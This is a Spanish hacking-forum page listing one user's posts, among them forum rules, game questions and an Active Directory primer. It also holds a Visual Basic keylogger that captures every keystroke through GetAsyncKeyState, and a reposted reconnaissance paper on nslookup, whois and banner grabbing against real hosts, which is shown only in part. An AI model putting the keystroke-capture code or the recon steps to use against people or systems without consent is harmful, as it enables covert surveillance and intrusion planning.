elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Temas
Páginas: 1 [2] 3 4
11  Programación / Programación General / Reglas - Subforo de Programación General en: 7 Noviembre 2005, 03:56 am
Objetivo general del foro de elhacker.net
 Promover la investigación, y fomentar la difusión del conocimiento, al brindar un medio de información, que protege y lucha por su libertad.


Subforo de Programación General

Objetivo:
 Siguiendo el objetivo general del foro, el subforo de Programación General, tiene como objetivo orientar a los usuarios en los distintos lenguajes de programacion y en cualquier plataforma. Se fomenta el estudio de los lenguajes de programación y el alcance de los mismos.

Justificación:
 Debido a la gran variedad de los lenguajes existentes y la imposibilidad de tener un subforo para cada lenguaje se crea el subforo de Programacion general, de forma que se facilite un lugar para la discusión de los temas que no encajen en otros subforos.

Limitantes:
 El subforo, para defender sus objetivos, no aceptara peticiones de programas o códigos. Entiéndase lo siguiente (AQUÍ NO SE HACE LA TAREA DE NADIE)

Reglas del subforo:

  • No se permite la publicación de archivos compilados sin proporcionar el código fuente.
  • Se tratan exclusivamente temas que no encajen en ningun otro subforo
  • Codigo debe de ir en su tag correspondiente [code][/code]
  • Los títulos deben incluir una pregunta precisa y el lenguaje en que se solicita
  • Por Ejemplo "[AWK] ¿Como accedo a los parámetros del programa?"
  • Se pregunta por conceptos abstractos. Aquí no estamos para hacerle el trabajo a nadie

Cualquier mensajes que incumpla con las normas sera borrado sin previo aviso.


Reglas generales del foro:
http://foro.elhacker.net/reglas





 
12  Programación / Programación Visual Basic / REGLAS DEL FORO ¡LEED TODOS! en: 5 Noviembre 2005, 13:24 pm
http://foro.elhacker.net/index.php/topic,93852.0.html


Leer tambien Reglas Generales
13  Foros Generales / Sugerencias y dudas sobre el Foro / No consigo hacer tablas en: 22 Octubre 2005, 13:28 pm
¿Alguien puede explicarme que tiene de malo esa tabla para que parezca cualquier cosa menos una tabla?
http://foro.elhacker.net/index.php/topic,91983.0.html

¿?
14  Programación / Programación Visual Basic / keylogger en VB en: 25 Agosto 2005, 00:06 am
Hola
Este es un keylooger que hice hace un año o así. Funciona bien aunque es manifiestamente mejorable. Es un buen ejemplo.

Hay dos partes. Una es un pequeño programa de prueba (para ver lo que el keylogger va detectando). Para ello le poneis los controles y el código indicado y luego os vais por ejemplo al notepad y os poneis a escribir. En el programa de prueba deberían ir quedando todas las pulsaciones que vais haciendo.

La rutina fundamental es la función ObtenerTecla y unas pequeñas funciones para saber si es mayúscula o no , etc.

Existe otra técnica posible para hacer un keylogger. La que se llama un hook de teclado (o un gancho de teclado). Tiene algunas ventajas y algún inconveniente.
-----------------------------------------------------------------------------------
Programa que prueba la rutina
En una aplicación visual basic añadir al formulario form1 el cuadro de texto text1 con las siguientes propiedades:
Código:
text1.multiline = true 
text1.heigh= 1335
text1.width = 12975


Poner un objeto timer con las siguiente propiedad
Código:
timer1.interval=100
(probar con distintos resultados para sacar consecuencias)

Poner un command con la siguiente propiedad
Código:
command1.caption="Limpiar" 


----------------------------------------------------------------------------------
Rutinas del programa de prueba

Código:
Private Sub Command1_Click() 
Text1 = "" ' vaciar textbox
End Sub


Código:
Private Sub Text1_Change() 
If Len(Text1) > 500 Then
' Escribir txt.log
End If
End Sub

-----------------------------------------------------------------------------------
comienzo de keylogger
------------------------------------------------------------------------------------
Función ShiftPulsado. Comprueba si se ha pulsado cualquiera de las dos teclas shift del teclado (es posible diferenciar cada una si se quiere)

Código:
Private Function ShiftPulsado() ' true si está pulsado shift 
ShiftPulsado = IIf(GetKeyState(16) < 0, True, False) 'VK_SHIFT
End Function

------------------------------------------------------------------------------------
Función BloqMayus. Comprueba si se ha activado bloq mayus

Código:
Private Function BloqMayus() 'True si está pulsado bloqmayus 
BloqMayus = IIf(GetKeyState(20) < 0, True, False) 'VK_CAPSLOCK
End Function

------------------------------------------------------------------------------------
Función NumLock. Comprueba si está pulsada la tecla Numlock

Código:
Private Function NumLock() 'True si está pulsado NUMLOCK 
NumLock = IIf(GetKeyState(144) < 0, True, False) 'VK_NUMLOCK
End Function

-----------------------------------------------------------------------------------
Función AltGr comprueba si está pulsada la tecla ALT GR.

Código:
Private Function AltGr() 'true si está pulsado ALT GR 
AltGr = IIf(GetKeyState(165) < 0, True, False) 'VK_RMENU
End Function

-----------------------------------------------------------------------------------
Función del timer que comprueba cada cierto intervalo de tiempo si se ha pulsado una tecla. Para ello revisa cada una de las posibilidades y si encuentra una tecla pulsada la guarda en la variable Tecla y la añade al text1.

Código:
Private Sub Timer1_Timer() 'probar con distintos intervalos de timer 
Dim Tecla As String
For x% = 0 To 255 'para los 255 códigos ascii
If GetAsyncKeyState(x%) Then 'si se ha pulsado una tecla
Tecla = ObtenerTecla(x%) 'obtener tecla pulsada
Text1 = Text1 & Tecla 'añadir tecla a teclas pulsadas
Text1.Refresh
End If
Next
End Sub

------------------------------------------------------------------------------------
Función ObtenerTecla. Se le pasa como parámetro el código virtual de la tecla pulsada y devuelve el resultado. Es la rutina propiamente de un keylogger.

Fijaos que en vez de el nombre de la tecla he pueso su código virtual. La razón es que teóricamente es igual, pero con los nombres no me funcionaba y cuando puse su código funcionó.

Código:
Function ObtenerTecla(x As Integer) 
Dim Tecla As String
Select Case x
Case 1 'VK_LBUTTON 'botón izquierdo del ratón
Case 2 'VK_RBUTTON 'botón derecho del ratón
Case 4 'VK_MBUTTON 'botón medio del ratón
Case 3 'VK_CANCEL 'break interrumpir
Case 8 'VK_BACK
Tecla = "[DEL]"
Case 9 'VK_TAB
Tecla = "[TAB]"
Case 13 'VK_RETURN
Tecla = "[ENTER]"
'opcionalmente se puede poner que se inserte línea en vez de insertar el literal [ENTER]
'sería así: Tecla = Chr(13) & Chr(10)
Case 92 'VK_CLEAR '5 en keypadd sin numlook
Case 19 'VK_PAUSE 'Pausa
Tecla = "[PAUSA]"
Case 32 'VK_SPACE
Tecla = " "
Case 27 'VK_ESC 'escape
Tecla = "[ESC]"
Case 33 'VK_PRIOR
Tecla = "[RE PAG]"
Case 34 'VK_NEXT
Tecla = "[AV PAG]"
Case 35 'VK_END
Tecla = "[FIN]"
Case 36 'VK_HOME
Tecla = "[INICIO]"
Case 37 'VK_LEFT
Tecla = "[IZQ]"
Case 38 'VK_RIGHT
Tecla = "[DER]"
Case 39 'VK_UP
Tecla = "[ARRIBA]"
Case 40 'VK_DOWN
Tecla = "[ABAJO]"
Case 44 'imprpant
Tecla = "[IMPR PANT]"
Case 45, VK_INSERT
Tecla = "[INS]"
Case 46, VK_DELETE
Tecla = "[SUPR]"
Case 48 To 57 'VK_0 - VK_9
If Not ShiftPulsado Then 'si no se ha cambiado tecla de shift
Tecla = Str$(x - 48) 'poner en tecla el nº correspondiente
Else
Tecla = Mid$("!""""·$%&/()=", x - 47, 1) 'extraer el caracter correspondiente
End If
If AltGr Then
If x = 49 Then 'alt gr + 1
Tecla = "|"
ElseIf x = 50 Then 'alt gr + 2
Tecla = "@"
ElseIf x = 51 Then 'alt gr + 3
Tecla = "#"
ElseIf x = 54 Then 'alt gr +6
Tecla = "¬"
End If
End If
Case 65 To 90 'letras VK_A - VK_Z
If BloqMayus Then
Tecla = IIf(ShiftPulsado, LCase$(Chr(x)), UCase(Chr(x)))
Else
Tecla = IIf(ShiftPulsado, UCase$(Chr(x)), LCase$(Chr(x)))
End If
Case 96 To 105 'numpad VK_NUMPAD0 - VK_NUMPAD9'
If Not NumLock Then
Tecla = LTrim$(Str$(x - 96)) 'obtener número correspondiente a teclado numpad
Else
Tecla = ObtenerTecla(x - 48) 'obtener valor correspondiente a numpad sin numlock
End If
Case 106 'VK_MULTIPLY
Tecla = "*"
Case 107 'VK_NUMPADADD
Tecla = "+"
Case 110 'VK_NUMPADDECIMAL
Tecla = "."
Case 111 'VK_NUMPADDIVIDE
Tecla = "/"
Case 109 'VK_SUBSTRACKT
Tecla = "-"
Case 112 To 123 'VK_F1 - VK_F12
Tecla = "[F" & x - 111 & "]"
Case 145 'VK_SCROLL 'Bloq Despl
Tecla = "[BLOQ DESPL]"
Case 186 '^`
Tecla = IIf(ShiftPulsado, "^", "`")
Tecla = IIf(AltGr, "[", Tecla)
Case 187 '+ *
Tecla = IIf(ShiftPulsado, "*", "+")
Tecla = IIf(AltGr, "]", Tecla)
Case 188 '; ,
Tecla = IIf(ShiftPulsado, ";", ",")
Case 189 '- _ )
Tecla = IIf(ShiftPulsado, "_", "-")
Case 190 ': .
Tecla = IIf(ShiftPulsado, ":", ".")
Case 191 'ç Ç
Tecla = IIf(ShiftPulsado, "Ç", "ç")
Tecla = IIf(AltGr, "}", Tecla)
Case 192 '~ '
Tecla = IIf(ShiftPulsado, "~", "'")
Case 219 '? '
Tecla = IIf(ShiftPulsado, "?", "'")
Case 220 '| \
Tecla = IIf(ShiftPulsado, "ª", "º")
Tecla = IIf(AltGr, "\", Tecla)
Case 221 '¿ ¡
Tecla = IIf(ShiftPulsado, "¿", "¡")
Case 222 ' ¨ ´
Tecla = IIf(ShiftPulsado, "¨", "´")
Tecla = IIf(AltGr, "{", Tecla)
Case 226 ' < >
Tecla = IIf(ShiftPulsado, ">", "<")
End Select
ObtenerTecla = Tecla
End Function
15  Media / Juegos y Consolas / ¿Sin juegos en zone.msn.com? en: 3 Agosto 2005, 00:38 am
Hola
Yo suelo jugar al ajedrez. Suele haber varios salones y cientos de personas. Me divierte echar partiditas y gano a menudo.

No solo estaba el juego del ajedrez. Había muchos mas y miles de personas jugaban en ellos.

Llevo dos días en que al entrar en la página solo salen 7 juegos y nada mas ¿Donde están todos? yo me iba a 'free online' y allí estaban.

¡joer! ¡con la de puntos que llevaba!!

¿Un sitio de juegos on line sin juegos on line?
16  Media / Juegos y Consolas / Ogame: ¿Qué defensas tengo? en: 29 Julio 2005, 14:14 pm
Hola

Estoy jugando en dos universos y me he hecho un lío. No se que defensas he construído en cada sitio.

¿Donde dice eso? No lo veo por ningún lado

Un saludo
17  Media / Juegos y Consolas / Consejos Ogame en: 23 Julio 2005, 17:52 pm
Hola
Estoy comenzando a jugar. Todavía no tengo naves espaciales ni nada, pero pongo esto para los que estais empezando (solo tengo 200 puntos).

Primero en el foro de ogame (en FAQ) hay un post con una secuencia para aprender a jugar. No está mal, yo la he seguido en el universo 4.

También he empezado otra partida en el universo 11. Allí he hecho lo que me ha parecido mejor con la experiencia acumulada (que es bien poca xD) y me he dedicado a construir minas de cristal, minas de metal, deuterio y plantas de energía solar. He crecido muy rápido. A pesar de que la segunda partida la empecé dos semanas después me falta poco para alcanzar a la primera. Así que aquí va mi consejo:

Inicialmenet no os metais en tecnologías ni hangar ni nada. Lo importante es producir. Para ello solo construis metal, cristal, deuterio y estaciones de energía solar para mantener todo funcionando.

Procurad que siempre haya energía para todo (en recursos)

Cuando alcanceis en minas y cristal y deuterio un nivel 12 (aproximadamente) podeis crear el laboratorio de investigación (sin dejar de ir aumentando minas, cristal, deuterio y energía para todo ello.

El laboratorio os podrá acceder a crear tecnología. A partir de este momento y sin dejar de producir también debeis fijaros objetivos (aquí es donde estoy yo ahora).

Yo me fijé como objetivo tener la capacidad de crear defensas si las necesito así que decidí aprender a crear laser pequeño, laser grande, cúpula pequeña y cúpula grande.

Para el laser pequeño hace falta conocer
  • Tecnología de energía(nivel 1)
  • Hangár(nivel 2)
  • Tecnología laser(nivel 3)

Así que me dediqué a desarrollar esa tecnología (repito sin dejar de producir)
Luego el laser grande
  • Tecnología de energía(nivel 3)
  • Hangár(nivel 4)
  • Tecnología laser(nivel 6)
Ya soy capaz de crear ambos. Ahora quiero aprender a crear cúpulas pequeñas. Para ello necesito
  • Tecnología de defensa(nivel 2)
  • Hangár(nivel 1)
Y luego cúpulas grandes
  • Tecnología de defensa(nivel 6)
  • Hangár(nivel 6)
Con eso seré capaz de defenderme (bueno, depende de quién ataque claro) razonablemente porque he leído que debo poner la siguiente proporción para ir bien protegido:
  • un laser grande por cada cuatro pequeños
  • una cúpula pequeña por cada 20 laser pequeños
  • un cañon de gaus por cada 30 laser pequeños
  • Un cañon de plasma por cada 100 laser pequeños
  • Una cúpula grande por cada 100 laser pequeños

Y es lo que pienso hacer. Ir creando esta tecnología y no dejar de producir recursos.

Mi duda es ¿hay alguna forma de acelerar la producción? porque he creado varias fábricas de robots y no parece que haya acelerado gran cosa, ahora producir una nueva fábrica o fuente de energía me lleva una hora

Ya os contaré cuando decida crear escuadrones y colonizar. A eso aún no he llegado

Un saludo
 ;D
18  Informática / Tutoriales - Documentación / INTRODUCCION A ACTIVE DIRECTORY en: 6 Septiembre 2004, 10:17 am
¿qué es active directory?

Es un sistema parejo al arbol de netware que sirve para  compartir recursos en un conjunto de dominios. Para ello utiliza un sistema común de resolución de nombres (dns) y un catálogo común que contiene una réplica completa de todos los objetos de directorio del dominio en que se aloja además de una replica parcial de todos los objetos de directorio de cada dominio del bosque

El objetivo de un catálogo global es proporcionar  autentificación a los inicios de sesión.

Además contiene información sobre todos los objetos de todos los dominios del bosque, la búsqueda de información en el directorio no requiere consultas innecesarias a los dominios.

Una única consulta al catálogo produce la información sobre donde se puede encontrar el objeto.

En definitiva Active Directory es el servicio de directorio incluído con Windows 2000/2003

¿Qué es un servicio de directorio?

Un servicio de directorio es uno de los componentes  más importantes de una red. Los usuarios y administradores con frecuencia no saben el nombre exacto  de los objetos en que están interesados. Quizá conozcan uno o más atributos de los objetos y puedan consultar el directorio para obtener una lista de objetos que concuerden cono los atributos: por ejemplo, "Encontar todas las impresoras duplex en Edificio B". Un servicio de directorio permite que un usuario encuentre cualquier objeto con sólo  uno de sus atributos.

¿Qué es un objeto?

Es cualquier cosa que tenga entidad en el directorio. Puede ser un programa, un usuario, un ordenador, un router, una impresora, un proxy, ...

¿Qué es un dominio?

Es un conjunto de normas que especifican que administran los recursos y los clientes en una red local.

En un dominio hay lo que se llama un servidor principal llamado pdc (primary domain controller) que es quien asigna derechos controla usuarios y recursos.

Dado que este servidor puede recibir muchas peticiones de red por parte de los clientes, es posible instalar un servidor de réplica llamado bdc  (backup domain controller) que contiene siempre una réplica de la base de datos del pdc y actúa como pdc en cuanto a peticiones de clientes.

Además en caso de fallo del pdc, él se sitúa en el dominio como pdc.

En caso de haber varios bdc, uno de ellos se coloca como pdc y los demás se dedican a respaldar a ese.

¿Que es un arbol?

Es un conjunto de dominios con relaciones de confianza entre sí que comparten recursos, clientes y un sistema de resolución de nombres.

¿Qué es un bosque?

Es un conjunto de árboles de dominio con relaciones de confianza entre sí

¿Por qué es tan importante active directory?

Por que es la respuesta a la crítica que siempre se le hizo a microsoft en windows NT de que sus sistemas de red no son escalables. Con active directory se agilizan las búsquedas de recursos, se asegura la autentificación de usuarios y máquinas, se comparten mejor los recursos de la red, se abandona netbios como protocolo para compartir recursos (se resuelven mediante dns y el catálogo global).

¿Qué hace active directory que no pueda hacer con un dominio?

Active directory no controla ordenadores,  controla dominios y administra los recursos y clientes de esos dominios.
Utiliza DNS como sistema de resolución de nombres (debe haber obligatoriamente uno).

Active directory es accesible desde cualquier servidor de dominio.

¿Es válido un servidor DNS que no sea de windows?
En principio debe ser válido cualquiera que cumpla las siguientes condiciones:
1. soportar el registro de recursos Localización de servicios  (rfc 2052)
2. Actualización dinámica (rfc 2136)
En la práctica yo lo he intentado con varios y no lo he conseguido salvo con el de microsoft.

¿Como se instala?
Al instalar cualquier versión de servidor win2k o windows 2003 se ejecutará el asistente de active directory.

Este asistente lo que hace en realidad es crear un servidor de dominio bien pdc (si no hubiera otro servidor) o bien bdc (si lo hubiera).

Después busca un servidor DNS y si lo encuentra lo anexa al arbol de active directory. Si no lo encuentra instala uno

Este servidor DNS es imprescindible porque en adelante los clientes localizarán un controlador de dominio para la autenticación mediante el envío de una  petición al servidor DNS identificado en sus configuraciones TCP/IP cliente

Además active directory utilizará dns para almacenar información sobre los  controladores de dominio de la red.

Si durante el proceso de instalación no fuera posible encontrar un servidor dns, windows instalará uno en la máquina por lo que esta actuará no solo como servidor de dominio sino también como servidor dns.

En adelante cada vez que queramos cambiar algo respecto a active directory deberemos acceder a la consola desde el panel de control - herramientas administrativas -
configuración del servidor (también se puede ejecutar dcpromo.exe).

¿Hay algo parecido en linux?

No, y no lo habrá por bastante tiempo. SAMBA con LDAP es algo que aún da muchos problemas y probablemente no funcionará hasta que el equipo de desarrollo de Samba solucione esos problemas.

No digo que no se pueda, pero no con el nivel de estabilidad y confiabilidad que en Windows. Al menos yo no he conseguido que funcione y el equipo de desarrollo de Samba desaconseja esta dirección hoy por hoy.

¿Para que me sirve?

Es util en redes grandes que se puedan dividir en dominios mas pequeños, centros de trabajo con varios dominios y redes intranet donde hay sucursales que comparten recursos.

Sobre un dominio miempresa.com podré tener subdominios 'comerciales.miempresa.com' por ejemplo para el acceso al dominio 'comerciales'.

Las consultas a recursos de la red son mucho mas rápidas porque se resuelven mediante el catálogo global en vez de búsquedas netbios.

La autentificación también se resuelve mediante el catálogo lo que resuelve problemas de seguridad variados. Un directorio activo es lo mas seguro que tiene windows hoy por hoy.

Las consultas al servidor o a otros sitios se resuelven por dns y no por netbios.

La administración del directorio activo puede realizarse desde cualquier servidor de dominio de toda la red.

Puede incluir cada objeto individual (impresora, archivo o usuario), cada servidor y cada dominio en una sola red de área amplia. También puede incluir varias redes de área amplia combinadas.


Por cierto ¿Alguien ha conseguido utilizar samba como bdc en un directorio activo?
19  Programación / Ejercicios / Proyecto: Gestión de facturas (visita guiada) en: 7 Julio 2004, 05:05 am
Dado que he puesto un ejercicio 17 que en realidad es un proyecto voy a hacerlo yo aquí paso a paso para que podais seguirme.

Este post está bloqueado para que no se me pierda el hilo, pero si teneis problemas posteadlas y en paz.

Voy a utilizar el modelo de objetos DAO por ser mas comprensible.
20  Informática / Tutoriales - Documentación / Análisis Remoto de Sistemas por Honoriak en: 6 Julio 2004, 02:43 am
Hola

Este texto es de manual para aquellos interesados en temas de seguridad y hacking.

Lo pasteo aquí por temor a que cambie algún enlace y se pierda este texto

Extraído de http://www.sindominio.net/hmleioa01/material/analisis.txt
----------------------------------------------------------------------
Comienzo de pasteo
----------------------------------------------------------------------

/* honoriak  <EGC@argen.net>   <honoriak@mail.ru>   2000.12.26  Ante
   cualquier duda,  critica, pregunta, etc.  no dudes  en escribirme a
   una de las direcciones de e-mail que acabas de ver. Las fuentes que
   me ayudaron en  la elaboracion de este reducido  'paper' figuran al
   final de este  documento. Este paper ha sido  elaborado con emacs y
   joe. */

-----------------[ Analisis remoto de sistemas
      
--------------------------[ honoriak <honoriak@mail.ru> de HeliSec

      [ sección de I+D de networking-center.org ]
           
            [ Version Final ]

   Indice
   ======

   1. Introduccion:
 
   -  Localizacion.
 
   -  NS de la maquina.
 
   -  Informacion del registro del dominio.

   2. Analisis:

   - Sistema operativo:

      Analisis sin conocimiento de la pila TCP/IP.        
      
      Analisis basado en la pila TCP/IP.

      Fingerprinting pasivo

   - Servicios:    

      Software  de escaneo  de  puertos y  vulnerabilidades:
      panorama actual.

      Tecnicas usadas en el escaneo de puertos.

   - Relacion de principales servicios con puertos. Daemons.

   - CGIs

   3. Bibliografia y agradecimientos


           |---------------------------------------|


   1. Introduccion
      ============

   Localizacion:
   ~~~~~~~~~~~~~

   En este  manual se tratara  unicamente el caso de  un servidor
con una ip  fija y un dominio/s asociado, ya que  creo que el analisis
de sistemas  se aplica a este  tipo de configuraciones y  no me parece
logico  el  ocuparse de  ordenadores  de  usuarios  domesticos ya  que
normalmente no son los que necesitan este tipo de comprobaciones.

   Lo unico a resaltar es que las IPs de las maquinas que vamos a
analizar no pueden estar en ningun caso entre:
    
     ============================================
     |   Clase    Networks                   |
     |  A       de 10.0.0.0 a 10.255.255.255    |
     |   B       de 172.16.0.0 a 172.31.0.0      |
     |  C       de 192.168.0.0 a 192.168.255.0  |
     ============================================

   Ya  que estas  son de  uso  privado (para  LANs, intranets)  y
estamos tratando el caso de maquinas conectadas a internet. La version
del Internet  Protocol utilizada mayormente  en la actualidad es  la 4
pero es  cierto que  los esfuerzos porque  este sea reemplazado  en un
futuro no muy lejano por IPv6 es notable y en este cambiara el esquema
de direcciones y las direcciones seran mas largas.

   Dos  herramientas  de uso  muy  comun  entre  los usuarios  de
cualquier sistema  operativo serio son  ping y traceroute.   Me parece
que es  obvio su uso y sino,  siempre puedes acudir al  man para saber
todas sus  opciones de sintaxis. La  ultima de ellas,  muchas veces es
infravalorada  en un analisis  y realmente  puede dar  una idea  de la
situacion fisica del servidor  y maquinas cercanas a este. Actualmente
hay  bastantes  frontends  y  utilidades basadas  en  traceroute  para
x-windows e  incluso alguna de ellas  representa en un  mapa el camino
que  sigue  un  paquete  desde  nuestro sistema  hasta  la  maquina  a
analizar.

   Mas  adelante, comentaré  el  uso de  traceroute para  conocer
mejor el tipo de firewall que protege a una máquina.
   

   NS de la maquina
   ~~~~~~~~~~~~~~~~

   Otra  herramienta muy  util  en el  analisis  es el  nslookup,
gracias a ella  podremos saber el servidor de  nombres (NS) que ofrece
el dominio a nuestro servidor, es decir, el NS que hace que w.x.y.z sea
dddd.com. Para  obtener esta informacion,  haremos uso de  nuestro DNS
(es decir, el servidor de nombres que nos ofrece nuestro ISP). Asi por
ejemplo, suponiendo  que mi NS es ns1.worldonline.es  y queremos saber
cual es el NS de insflug.org, se actuaria de la siguiente forma:

$ nslookup insflug.org
Server:  ns1.worldonline.es
Address:  212.7.33.3

Name:    insflug.org
Address:  209.197.122.174

$ nslookup
Default Server:  ns1.worldonline.es
Address:  212.7.33.3

> set q=ns
> insflug.org
Server:  ns1.worldonline.es
Address:  212.7.33.3

Non-authoritative answer:
insflug.org   nameserver = NS0.NS0.COM
insflug.org   nameserver = NS84.PAIR.COM

Authoritative answers can be found from:
NS0.NS0.COM   internet address = 209.197.64.1
NS84.PAIR.COM   internet address = 209.68.1.177

   Como  puedes observar,  hemos obtenido  los NS  tanto primario
como   secundario   que  hace   que   insflug.org   este  asociado   a
209.197.122.174 siendo: NS0.NS0.COM  y NS84.PAIR.COM. Esta informacion
nos puede ser  de gran utilidad para cierto tipo de  cosas.  Lo que si
que puede ser de cierta utilidad es  saber que en los NS hay unas zone
files  en  las que  se  encuentra la  informacion  sobre  el dominio  a
analizar, de esta forma encontrariamos

         zone "insflug.org"{
          type master;
          file "insflug.org.zone";
     };

   en el fichero en el que se encontrase la informacion sobre las
secciones  de zona (algunas  veces /var/named/),  siendo la  zone file
para insflug.org /var/named/insflug.org.zone,  en el supuesto de estar
en /var/named/.  Alli encontrariamos

   @                 IN     NS     NS0.NS0.COM.
    www               IN     A      209.197.122.174
    ftp               IN     CNAME   www
         .....

   CNAME significa canonical name  y quiere decir que en realidad
la  ip  a   la  que  se  refiere  ftp.insflug.org   es  la  misma  que
www.insflug.org y que  en este caso es la  misma que insflug.org, como
podemos comprobar haciendo:

$ nslookup
Default Server:  ns1.worldonline.es
Address:  212.7.33.3

> set q=ns
> www.insflug.org
Server:  ns1.worldonline.es
Address:  212.7.33.3

Non-authoritative answer:
www.insflug.org   canonical name = insflug.org
      ...

> ftp.insflug.org
Server:  ns1.worldonline.es
Address:  212.7.33.3

ftp.insflug.org   canonical name = insflug.org
      ...

   De  esta  forma,  podremos  saber  si  los  demonios  de  ftp,
www...  de un dominio  se encuentran  en una  misma maquina  o maquinas
diferentes; muy util para tener una vision global del host a estudiar,
ya que  lo que en  principio se podria  pensar que era un  servidor en
particular  son  varios.  Ademas,  www.insflug.org  por ejemplo  puede
estar asociado a varias IPs y viceversa.

   Pese a  que para saber el  servidor de nombres  del servidor a
estudiar hemos utilizado  nslookup, que se supone que  es el metodo en
el cual  utilizamos un  poco "nuestros propios  medios", estos  NSs se
podrian saber haciendo uso del comando  que se utiliza en lo que viene
a continuacion: whois.


   Informacion del registro del dominio
   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

   Para  obtener informacion  sobre  el registro  de un  dominio,
entiendase  por dominio  ddd.xxx  y no  pr.ddd.xxx pr2.ddd.xxx...  que
serian considerados subdominios del primero,  se puede hacer uso de la
herramienta ya implementada  en la mayoria de los  unix whois. Asi, de
esta forma:

$ whois insflug.org
[whois.internic.net]

Whois Server Version 1.3

Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

   Domain Name: INSFLUG.ORG
   Registrar: NETWORK SOLUTIONS, INC.
   Whois Server: whois.networksolutions.com
   Referral URL: www.networksolutions.com
   Name Server: NS0.NS0.COM
   Name Server: NS84.PAIR.COM
   Updated Date: 24-jun-2000


>>> Last update of whois database: Mon, 25 Dec 2000 11:16:57 EST <<<

The Registry database contains ONLY .COM, .NET, .ORG, .EDU domains and
Registrars.

   Puedes observar como se han obtenido tambien los servidores de
nombres que  contienen la entrada  insflug.org (por esto  lo comentado
anteriormente).  Pero, en realidad, esto la mayoria de las veces no es
de mucha utilidad ya que  actualmente los registros de dominios no son
directos y en realidad no figura  el nombre del que lo quiso registrar
sino de  la empresa intermediaria  que hizo efectivo el  registro.  Lo
que si que nos proporciona una informacion mucho mas completa es hacer
un whois  al Whois Server que  nos ha proporcionado  este primer whois
insflug.org que es whois.networksolutions.com, asi de esta forma:

$ whois insflug.org@whois.networksolutions.com
[whois.networksolutions.com]
The Data in  Network Solutions' WHOIS database is  provided by Network
Solutions for information purposes, and to assist persons in obtaining
information  about or related  to a  domain name  registration record.
Network Solutions  does not guarantee  its accuracy.  By  submitting a
WHOIS query,  you agree that  you will use  this Data only  for lawful
purposes and that,  under no circumstances will you  use this Data to:
(1) allow,  enable,  or otherwise  support  the  transmission of  mass
unsolicited,  commercial  advertising   or  solicitations  via  e-mail
(spam);  or (2)  enable high  volume, automated,  electronic processes
that apply  to Network Solutions (or its  systems).  Network Solutions
reserves the right  to modify these terms at  any time.  By submitting
this query, you agree to abide by this policy.

Registrant:
Impatient & 'Novatous' Spanish FidoNet Linux Users Group (INSFLUG-DOM)
   Avda. Pablo VI, 11 - 4C
   Dos Hermanas, Sevilla 41700
   ES

   Domain Name: INSFLUG.ORG

   Administrative Contact, Billing Contact:
      Montilla, Francisco J  (FJM43)  pacopepe@INSFLUG.ORG
      Impatient & 'Novatous' Spanish FidoNet Linux Users Group
      Avda. Pablo VI, 11 - 4C
      Dos Hermanas, Sevilla 41700
      ES
      +34 955679066 (FAX) +34 955679066
   Technical Contact:
      Administrator, Domain  (DA550)  domain@PAIR.COM
      pair Networks, Inc
      2403 Sidney St, Suite 510
      Pittsburgh, PA 15203
      +1 412 681 6932 (FAX) +1 412 381 9997

   Record last updated on 25-Jul-2000.
   Record expires on 24-Jun-2001.
   Record created on 24-Jun-1998.
   Database last updated on 25-Dec-2000 20:18:04 EST.

   Domain servers in listed order:

   NS84.PAIR.COM      209.68.1.177
   NS0.NS0.COM         209.197.64.1

   Vemos pues, una informacion mucho mas completa =) Para obtener
   informacion sobre dominios que  no sean .com, .net, .org, .edu
   tendremos que saber el servidor que nos permite hacer un whois
   de  dicho dominio,  ya que  con el  whois.internic.net  no nos
   permitira esa busqueda,

$ whois ctv.es
[whois.internic.net]

Whois Server Version 1.3

Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

No match for "CTV.ES".

>>> Last update of whois database: Mon, 25 Dec 2000 11:16:57 EST <<<

The Registry database contains ONLY .COM, .NET, .ORG, .EDU domains and
Registrars.


   2. Analisis
      ========

   
   2.1 Sistema operativo
   ~~~~~~~~~~~~~~~~~~~~~
   
      I. Analisis sin conocimientos de la pila TCP/IP      
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
   
   De  paquete,  algunos  sistemas operativos  (quizas  versiones
antiguas),  tenian  o  incluso  tienen "por  costumbre"  darnos  dicha
informacion   (so  y  version)   al  telnetear   al  servidor   y  los
administradores no se preocupan de modificarlo. Asi que siempre puedes
probar haber si hay suerte y por ejemplo te encuentras con:

$ telnet jeropa.com
Trying 64.60.1.66...
Connected to jeropa.com.
Escape character is '^]'.

Cobalt Linux release 4.0 (Fargo)
Kernel 2.0.34C53_SK on a mips

login:
      ...

   Lo  que  es  cierto,  es  que cualquier  sysadmin  serio  debe
preocuparse  de  cambiar esto,  ya  que  tampoco  hay que  dar  tantas
facilidades.  Pero, en la actualidad si que es cierto que cada vez son
mas los  sysadmins que cambian  esto e incluso  ponen un so  o version
falsa. Asi que esta tampoco va a ser una muy buena solucion para saber
el sistema operativo  de la maquina que tratamos.  (El escaner ISS, de
pago, utiliza esta "fiable" tecnica,  asi que te recomiendo usar queso
o nmap).

   Aun asi, podemos seguir  obteniendo informacion sobre el SO de
la  maquina a  estudiar de  forma  mas o  menos parecida  ya que,  por
ejemplo, si tiene operativo www, ftp o snmp, a lo mejor se puede hacer
una peticion  al servidor web,  ejecutar SYST en  una sesion de  FTP o
simplemente ver la version del cliente  de FTP o usar snmpwalk (de las
utilidades CMU SNMP) para conseguir cierta informacion respectivamente
y saber en algunos casos el SO; de esta forma, por ejemplo:

$ telnet www.microsoft.com 80
Trying 207.46.230.229...
Connected to www.microsoft.akadns.net.
Escape character is '^]'.
probando?
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Wed, 27 Dec 2000 00:03:18 GMT
                ...

   Te suena de  algo lo de IIS/5.0? Pues ya  sabes hablamos de un
win*.

  __

$ telnet ftp.ciudadfutura.com 21
Trying 216.35.70.14...
Connected to ftp.ciudadfutura.com.
Escape character is '^]'.
220 Serv-U FTP-Server v2.5e for WinSock ready...
         ...

   Y  por  tanto  si  revisamos las  caracteristicas  del  Serv-U
   FTP-Server,
      
   | "FTP Serv-U from is a full-featured
   | FTP server that allows you to turn almost any
   | MS  Windows (9x, NT, 2000) computer into an
   | Internet FTP Server."

